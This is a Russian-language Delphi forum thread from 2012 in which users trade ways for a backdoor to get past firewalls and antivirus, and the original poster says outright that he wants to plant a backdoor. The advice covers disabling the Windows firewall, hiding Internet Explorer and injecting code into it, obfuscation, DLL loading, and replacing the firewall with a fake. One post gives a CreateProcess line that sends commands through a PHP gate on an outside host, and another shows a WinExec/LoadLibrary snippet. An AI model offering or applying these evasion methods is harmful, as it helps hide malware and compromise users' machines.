Методы обхода фаервлов (firewall) - delfcode
Четверг, 08.12.2016, 01:14 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx 
delfcode » Delphi » Вирусология Delphi » Методы обхода фаервлов (firewall)
Методы обхода фаервлов (firewall)
AndroidДата: Понедельник, 30.01.2012, 16:56 | Сообщение # 1
Участник
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 71
Статус: Offline
Ребята, стандартный фаер винды можно отключить командой из кнсоли. Еще можно добавиться в список доверенных приложений.

А есть ли какой-то универсальный метод, чтоб факт сетевого соединения остался либо незамеченным, либо фаер (не стандартный) на него не ругался???

Поделитесь мыслями на этот счет, плз.
 
AndroidДата: Понедельник, 30.01.2012, 17:13 | Сообщение # 2
Участник
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 71
Статус: Offline
Классная статья по поводу внедрения своего кода в чужой процесс на этом сайте. Как вы думаете, товарисчи, можно ли описанным методом грохать фаеры и антивири???
 
XSPYДата: Понедельник, 30.01.2012, 21:25 | Сообщение # 3
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 258
Статус: Offline
Android, можно,но сложно-дрова и самозащита некоторых ох какая настырная...

Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
 
vvova15Дата: Вторник, 31.01.2012, 10:14 | Сообщение # 4
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
фаер можно обойти используя internet explorer - ему можно в сеть выходить без базара и он находиться в списке доверенных.
так что используй его com-модель или запускай через createprocess с нужными параметрами



ICQ 185-398
 
AndroidДата: Четверг, 02.02.2012, 22:52 | Сообщение # 5
Участник
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 71
Статус: Offline
а если я хочу бэкдор впарить , каким образом можно эксплорер заюзать??? вот подскажите плиз практическим советом...
 
gravitasДата: Пятница, 03.02.2012, 09:02 | Сообщение # 6
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Ну можно, как сказал вован, запустить IE в скрытом виде (SW_HIDE). Потом проинжектить в его процесс свой код (исходник инжекта я выкладывал тут недавно).
Это, конечно, если ты там через сокеты будешь делать быкдур. Если делаешь с чем-то вроде ICQ клиента, то такой способ не проканает.


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
AndroidДата: Пятница, 03.02.2012, 10:50 | Сообщение # 7
Участник
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 71
Статус: Offline
а если делать через сокеты, то наверняка получится после инжекта обойти фаер??? щас же многие палят инжекты...
 
dolphinДата: Пятница, 03.02.2012, 20:07 | Сообщение # 8
Администратор
Сообщений: 902
Статус: Offline
Инжект + обфуксить код, не все спалят, обе темы обсуждались

http://delfcode.ru/search/?q=%D0%98%D0%BD%D0%B6%D0%B5%D0%BA%D1%82
http://delfcode.ru/forum/10-600-1


Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
vvova15Дата: Суббота, 04.02.2012, 06:20 | Сообщение # 9
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
нжект воспримется авирями в шктыки.

можно сделать гейт на php для отправки
и запускать типа
Code

CreateProcess(... "iexplore","http://ololo.ru/gate.php?cmd=и тут команда в байтах и процентах(urlencode), которая отправляется серверу скриптом",....)



ICQ 185-398
 
dolphinДата: Суббота, 04.02.2012, 11:20 | Сообщение # 10
Администратор
Сообщений: 902
Статус: Offline
Quote (vvova15)
гейт на php
тоже воспринимается и не меньше!


Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
AndroidДата: Суббота, 04.02.2012, 12:45 | Сообщение # 11
Участник
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 71
Статус: Offline
видимо, единственный путь - грохать фаер и заменять фейком...
 
dolphinДата: Суббота, 04.02.2012, 14:21 | Сообщение # 12
Администратор
Сообщений: 902
Статус: Offline
А подргузка dll в эксплорер или опера не подходит?

Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
gravitasДата: Суббота, 04.02.2012, 16:42 | Сообщение # 13
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Без инжекта грузануть длл в определенный процесс? Хотя, впринципе можно просто LoadLibrary вызвать в своей проге, а уже в дллке проверять, в какой она проге.
P.S. Вроде вполне реальный обход.


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
AndroidДата: Суббота, 04.02.2012, 21:49 | Сообщение # 14
Участник
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 71
Статус: Offline
ребят... я че-то по ходу ваще не в теме... а подгрузка своей длл в чужой процесс - это не инжект??????
 
Волк-1024Дата: Суббота, 04.02.2012, 21:54 | Сообщение # 15
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
Quote
а подгрузка своей длл в чужой процесс - это не инжект??????

Оно самое.

И что-то тут одно пустословие. Нужно слова сопровождать кодом.

Например, вот инжект библиотеки по пиду процесса (выдрал из своей проги):

Доступно только для пользователей


Pascal, C\C++, Assembler, Python

Сообщение отредактировал Волк-1024 - Суббота, 04.02.2012, 22:01
 
gravitasДата: Воскресенье, 05.02.2012, 10:06 | Сообщение # 16
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Волк-1024, код твой палится, и фаерволами тоже.
Quote (Android)
ребят... я че-то по ходу ваще не в теме... а подгрузка своей длл в чужой процесс - это не инжект??????

Если просто вызвать LoadLibrary, то нужная длл подгрузится во все оконные процессы.
Только отвечая на вопрос понял, что
Code

WinExec('iexplore.exe', SW_HIDE);
LoadLibrary('mydll.dll');

не проканает, ибо нужно окно. Без инжекта в безоконное приложение можно подгрузить длл как-нить?


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
Волк-1024Дата: Воскресенье, 05.02.2012, 12:11 | Сообщение # 17
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
Quote
код твой палится, и фаерволами тоже.

Странно... Мой Нод ничего не вякает, ни на сам код, ни на инжект. Хотя возможно из-за того, что я его выдрал из нормальной проги, не малвари.

Gravitas: на scan4you.net будет примерно 12\37, я проверял как то


Pascal, C\C++, Assembler, Python
 
AndroidДата: Понедельник, 06.02.2012, 10:54 | Сообщение # 18
Участник
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 71
Статус: Offline
а ты его как выдрал? дизассемблировал или исходник изначально был???
 
Волк-1024Дата: Понедельник, 06.02.2012, 14:28 | Сообщение # 19
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
Android, "Выдрал" подразумевается, что у меня есть исходник моей же проги smile

Pascal, C\C++, Assembler, Python
 
delfcode » Delphi » Вирусология Delphi » Методы обхода фаервлов (firewall)
Страница 1 из 11
Поиск:

delfcode.ru © 2008 - 2016 Хостинг от uCoz